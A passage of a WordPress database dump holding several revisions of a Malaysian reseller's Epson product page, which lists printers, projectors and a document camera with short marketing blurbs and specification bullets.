EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:11:30','2019-09-25 09:11:30','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3460,1,'2019-09-25 17:13:11','2019-09-25 09:13:11','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:13:11','2019-09-25 09:13:11','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3461,1,'2019-09-25 17:13:38','2019-09-25 09:13:38','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" 